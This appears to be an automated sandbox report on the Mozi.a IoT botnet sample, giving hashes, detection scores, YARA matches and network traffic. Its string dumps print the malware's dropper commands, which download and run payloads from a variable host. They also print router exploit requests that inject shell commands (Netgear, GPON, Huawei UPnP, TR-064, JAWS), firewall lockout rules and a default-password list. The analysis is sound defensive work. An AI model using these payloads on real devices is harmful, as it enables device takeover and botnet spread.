Linux Analysis Report Mozi.a

Overview

General Information

Sample Name:	Mozi.a
Analysis ID:	510721
MD5:	e30a81d66f18f07647397d1defbad11b
SHA1:	a7fd1a1d71f7f7b00886741db52c42af0c8873f1
SHA256:	b7ba5aa2f8f7781d408e87b2131fa2cc9b95cdf3460f9778229398c9e851772a
Infos:

Detection

Mirai

Score:	92
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Yara detected Mirai

Multi AV Scanner detection for submitted file

Found strings indicative of a multi-platform dropper

Sample contains only a LOAD segment without any section mappings

Yara signature match

Sample contains strings that are potentially command strings

Sample contains strings indicative of password brute-forcing capabilities

Uses the "uname" system call to query kernel version information (possible evasion)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Signatures

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: Mozi.a

Avira: detected

Multi AV Scanner detection for submitted file

Source: Mozi.a	Virustotal: Detection: 63%	Perma Link
Source: Mozi.a	Metadefender: Detection: 50%	Perma Link
Source: Mozi.a	ReversingLabs: Detection: 78%

Spreading:

Found strings indicative of a multi-platform dropper

Source: Mozi.a	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Mozi.a	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh \|\|curl -O http://%s:%d/bin.sh \|\|/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh \|\|(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Mozi.a	String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'

Networking:

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42

Source: Mozi.a	String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: Mozi.a	String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: Mozi.a	String found in binary or memory: http://%s:%d/Mozi.m
Source: Mozi.a	String found in binary or memory: http://%s:%d/Mozi.m;
Source: Mozi.a	String found in binary or memory: http://%s:%d/Mozi.m;$
Source: Mozi.a	String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: Mozi.a	String found in binary or memory: http://%s:%d/bin.sh
Source: Mozi.a	String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: Mozi.a	String found in binary or memory: http://127.0.0.1
Source: Mozi.a	String found in binary or memory: http://127.0.0.1sendcmd
Source: Mozi.a	String found in binary or memory: http://HTTP/1.1
Source: Mozi.a	String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: Mozi.a	String found in binary or memory: http://ipinfo.io/ip
Source: Mozi.a	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: Mozi.a	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Mozi.a	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Mozi.a	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: Mozi.a, 5244.1.00000000462a18a2.00000000e4311033.r-x.sdmp	String found in binary or memory: http://upx.sf.net

System Summary:

Sample contains only a LOAD segment without any section mappings

Source: LOAD without section mappings

Program segment: 0x400000

Yara signature match

Source: Mozi.a, type: SAMPLE	Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: Mozi.a, type: SAMPLE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5244.1.00000000462a18a2.00000000e4311033.r-x.sdmp, type: MEMORY	Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4

Sample contains strings that are potentially command strings

Source: Initial sample	Potential command found: POST /cdn-cgi/
Source: Initial sample	Potential command found: GET /c HTTP/1.0
Source: Initial sample	Potential command found: POST /cdn-cgi/ HTTP/1.1
Source: Initial sample	Potential command found: GET %s HTTP/1.1
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: Initial sample	Potential command found: rm /home/httpd/web_shell_cmd.gch
Source: Initial sample	Potential command found: echo 3 > /usr/local/ct/ctadmincfg
Source: Initial sample	Potential command found: mount -o remount,rw /overlay /
Source: Initial sample	Potential command found: mv -f %s %s
Source: Initial sample	Potential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: GET /c
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: killall -9 %s
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
Source: Initial sample	Potential command found: killall -9 telnetd utelnetd scfgmgr
Source: Initial sample	Potential command found: dd bs=52 count=1 if=/bin/ls \|\| cat /bin/ls \|\| while read i; do echo $i; done < /bin/ls \|\| while read i; do echo $i; done < /bin/busybox
Source: Initial sample	Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample	Potential command found: GET /%s HTTP/1.1
Source: Initial sample	Potential command found: POST /%s HTTP/1.1
Source: Initial sample	Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample	Potential command found: POST /picsdesc.xml HTTP/1.1
Source: Initial sample	Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample	Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample	Potential command found: POST /UD/act?1 HTTP/1.1
Source: Initial sample	Potential command found: POST /HNAP1/ HTTP/1.0
Source: Initial sample	Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample	Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample	Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Source: Initial sample	Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample	Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron

Sample contains strings indicative of password brute-forcing capabilities

Source: Initial sample	String containing potential weak password found: admin
Source: Initial sample	String containing potential weak password found: default
Source: Initial sample	String containing potential weak password found: support
Source: Initial sample	String containing potential weak password found: service
Source: Initial sample	String containing potential weak password found: supervisor
Source: Initial sample	String containing potential weak password found: guest
Source: Initial sample	String containing potential weak password found: administrator
Source: Initial sample	String containing potential weak password found: 123456
Source: Initial sample	String containing potential weak password found: 54321
Source: Initial sample	String containing potential weak password found: password
Source: Initial sample	String containing potential weak password found: 12345
Source: Initial sample	String containing potential weak password found: admin1234

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Source: Initial sample	String containing 'busybox' found: busybox
Source: Initial sample	String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample	String containing 'busybox' found: /bin/busybox cat /bin/ls\|head -n 1
Source: Initial sample	String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample	String containing 'busybox' found: /bin/busybox cat /bin/ls\|more
Source: Initial sample	String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls\|head -n 1
Source: Initial sample	String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls \|\| cat /bin/ls \|\| while read i; do echo $i; done < /bin/ls \|\| while read i; do echo $i; done < /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls \|\| /bin/busybox cat /bin/ls \|\| while read i; do printf $i; done < /bin/ls \|\| while read i; do printf $i; done < /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod 777 .i \|\| (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample	String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh \|\|curl -O http://%s:%d/bin.sh \|\|/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh \|\|(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample	String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i \|\| (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample	String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>

Source: classification engine

Classification label: mal92.spre.troj.linA@0/0@0/0

Source: Mozi.a

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Malware Analysis System Evasion:

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /tmp/Mozi.a (PID: 5244)

Queries kernel information via 'uname':

Jump to behavior

Source: Mozi.a, 5244.1.000000004f8eb38e.0000000028a15c7e.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips
Source: Mozi.a, 5244.1.00000000b89dae2d.00000000a566f1aa.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips
Source: Mozi.a, 5244.1.000000004f8eb38e.0000000028a15c7e.rw-.sdmp	Binary or memory string: UV!/etc/qemu-binfmt/mips
Source: Mozi.a, 5244.1.00000000b89dae2d.00000000a566f1aa.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/Mozi.aSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Mozi.a
Source: Mozi.a, 5244.1.00000000b89dae2d.00000000a566f1aa.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 5 (Trace/breakpoint trap) - core dumped

Stealing of Sensitive Information:

Yara detected Mirai

Source: Yara match

File source: Mozi.a, type: SAMPLE

Remote Access Functionality:

Yara detected Mirai

Source: Yara match

File source: Mozi.a, type: SAMPLE

Screenshots

No Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

ID:	510721
Product:	CloudBasic
Start time:	06:46:30
Start date:	28.10.2021
Sample:	Mozi.a
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	e30a81d66f18f07647397d1defbad11b
SHA1:	a7fd1a1d71f7f7b00886741db52c42af0c8873f1
SHA256:	b7ba5aa2f8f7781d408e87b2131fa2cc9b95cdf3460f9778229398c9e851772a
Filetype:	ELF Executable and Linkable format (Linux) (4029/14) 50.16%

Linux Analysis Report Mozi.a

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Spreading:

Networking:

System Summary:

Malware Analysis System Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Network Map

Contacted Public IPs